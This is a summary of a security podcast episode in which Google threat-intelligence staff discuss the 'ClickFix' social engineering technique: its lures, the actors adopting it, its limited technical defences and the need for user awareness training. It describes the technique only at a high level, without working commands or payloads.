The Defender's Advantage Podcast
Episode Summary: The Rise of ClickFix
Host: Luke McNamara (Google Threat Intelligence Group)
Guest: Dima Lentz (Security Engineer, Google Threat Intelligence Group)
Date: July 15, 2025
Episode Overview
This episode focuses on the emerging “ClickFix” technique in cyberattacks—a growing, human-centric social engineering approach that leverages fake problem prompts (like captchas, expired certificates, or security warnings) to trick users into running malicious commands on their systems. The discussion covers its evolution across cybercrime and nation-state actors, technical and human factors making ClickFix attractive, notable campaigns, defenses organizations might consider, and predictions about the technique’s future development.
Key Discussion Points & Insights
1. Defining ClickFix (01:35)
- ClickFix is a social engineering method where users are convinced—via deceptive prompts—to copy and run malicious commands, initiating an infection chain.
- Commands often masquerade as solutions to common computer issues (e.g., “fixing” DNS problems, resolving expired certificates, or enabling site access).
- While not brand new, activity spiked around August 2024, with prevalence continuing to increase.
Quote:
“Qlikfix is a social engineering technique that tries to convince user into copying and running malicious command on their systems which in turn will lead to the infection chain and run a certain malware...”
— Dima Lentz (01:35)
2. Why Threat Actors Favor ClickFix (04:01)
- Lower Barriers & High Success:
- Unlike technical exploits (like zero-days), ClickFix is comparatively simple to deploy.
- Leverages user trust—no pop-up warnings or antivirus blocks since the user runs native, often legitimate administrative tools (e.g., PowerShell, MSHTA).
- The commands often have minimal footprint and evade traditional defenses.
Quote:
“The whole idea of Qlik Fix is lucrative to threat actors... on the social engineering side... the trust is higher... There is no smart screen notifications, there is no warning... On the technical side... antiviruses, web browser security features... would not react to something like this.”
— Dima Lentz (04:01)
3. Behavioral Engineering & MFA Fatigue Comparison (06:39)
- ClickFix exploits behavioral patterns—users are habituated to deal with frequent captchas and browser issues.
- The attack bears resemblance to MFA fatigue attacks: repeated prompts lower user skepticism, leading to compliance.
4. Spectrum of Adopters: From Cybercrime to Espionage (08:07)
- Cybercrime Origin: Initially popular for malware (especially info-stealers) distribution among financially-motivated actors.
- Espionage Uptake: Increasingly seen in state-sponsored campaigns against NGOs, governments—often with more targeted “document access” or device validation lures.
Ecosystem Evolution Example:
- ANK5142: Transitioned from fake browser update pop-ups to ClickFix for distributing multi-stage malware like “Clear Shot,” commonly targeting credentials.
- ANK5692 & Others: Used similar tricks to deploy loaders and initial-access tools, sometimes shifting toward info-stealers as payloads.
- APT33: Used ClickFix in targeted attacks disguised as document access checks (e.g., fake registration steps for PDF access).
5. Technical Delivery & Variants (10:53 | 11:03)
- Compromised Legitimate Sites: Most effective—users trust familiar sites, making fake overlays more convincing.
- Targeted Emails/Spam: In espionage, users receive targeted lures tied to document access or identity verification.
6. Campaign Examples & Ingenious Lures (12:58 | 13:13)
- Template Diversity: Adversaries rapidly iterate fake prompts—Defender (Windows security) alerts (complete with sounds), various business productivity brands, etc.
- Dynamic Trust Signals: Customization for operating systems—bash scripts for macOS users, details like use of legitimate notification sounds.
Quote:
“One of the recent campaigns... was faking Defender Alert, including the audio notification... This Defender notification would ask to run certain commands... which in fact will start the infection.”
— Dima Lentz (13:13)
7. Defensive Measures: Limitations and Recommendations (15:54)
-
Technical Barriers:
- PowerShell restrictions and script signatures largely ineffective; because users manually run benign-appearing commands.
- Advanced lockdowns (limiting PowerShell itself) are often impractical for business environments.
- Possible detection avenue: monitoring JavaScript clipboard write events (
execCommand("copy");ornavigator.clipboard.writeText)—though adversaries may quickly adjust if this becomes widespread.
-
User Awareness is Critical:
- Continuous security awareness training: educate about novel lures beyond traditional phishing.
- Highlight that user-initiated command execution—even when prompted by trusted-looking sources—should be scrutinized.
Quote:
“Ongoing security awareness training is essential here because the novelty of this attack is something which I think makes it so successful.”
— Dima Lentz (17:56)
8. Technique Evolution & Future Outlook (18:46)
- Platform Expansion: Initially Windows-focused; now seeing bash scripts for macOS—Linux may be next.
- Obfuscation & Evasion: Kits becoming visually dynamic, using images instead of text to evade detection, greater obfuscation in core mechanisms.
- Example: Cold Reaver replaced on-screen command prompts with images, defeating some signature-based detections.
- Telemetry and Feedback Loops: Attackers increasingly gather data from victims’ browsers to refine tactics, e.g., Cloudflare-branded kits using Telegram APIs for feedback and monitoring.
- Broader Brand Abuse: Attackers likely to branch into other trusted services (e.g., GitHub, YouTube).
Quote:
“I think that will be one avenue where threat actors will potentially experiment with more platforms... We see already that kids become more dynamic and visually appealing which also increases trust and contributes to their success...”
— Dima Lentz (18:46)
Notable Quotes & Memorable Moments
-
On user conditioning:
“People are used to it, to be honest, so when they see this new type of captcha they’re not surprised... willing to follow the instructions.”
— Dima Lentz (04:01) -
On campaign creativity:
“This experimenting with new avenues, how to infect, how to approach users is particularly interesting and I think the trend will continue. So more and more brandings... will be faked in this regard.”
— Dima Lentz (13:13) -
Prediction:
“Clearly the success of this will likely drive or shape future actor investments and resources into continuing to experiment with what is the most successful way to socially engineer the end user.”
— Luke McNamara (22:29)
Key Timestamps
- 01:35 — What is ClickFix?
- 04:01 — Why it’s appealing to threat actors
- 08:07 — Who’s using ClickFix: crime and espionage
- 10:53–11:03 — Infection chain: Initial triggers and delivery mechanisms
- 12:58 — Notable campaigns and templates
- 13:13 — Defender Alert audio deception and campaign iteration
- 15:54 — Defenses and user awareness strategies
- 18:46 — Future predictions & technique evolution
Summary Takeaways
- ClickFix leverages the user’s trust and computer habits, making infection chains both simple and effective for a variety of threat actors.
- Adversaries are rapidly experimenting with prompts, brands, and delivery platforms while putting effort into evasion and feedback loops.
- Technical controls have limited value; continual user education and adaptive monitoring of web/script behaviors are essential.
- The threat is evolving—expect further adoption, diversification, and technical sophistication as attackers refine this low-signature, high-success approach.
For organizations:
Prioritize user education around new lures, and consider supplementing technical monitoring to flag suspicious clipboard or command behaviors initiated through browsers.
For defenders:
Stay alert to evolving ClickFix techniques, as adversaries are quick to adapt visuals, delivery mechanisms, and social engineering tricks to stay ahead.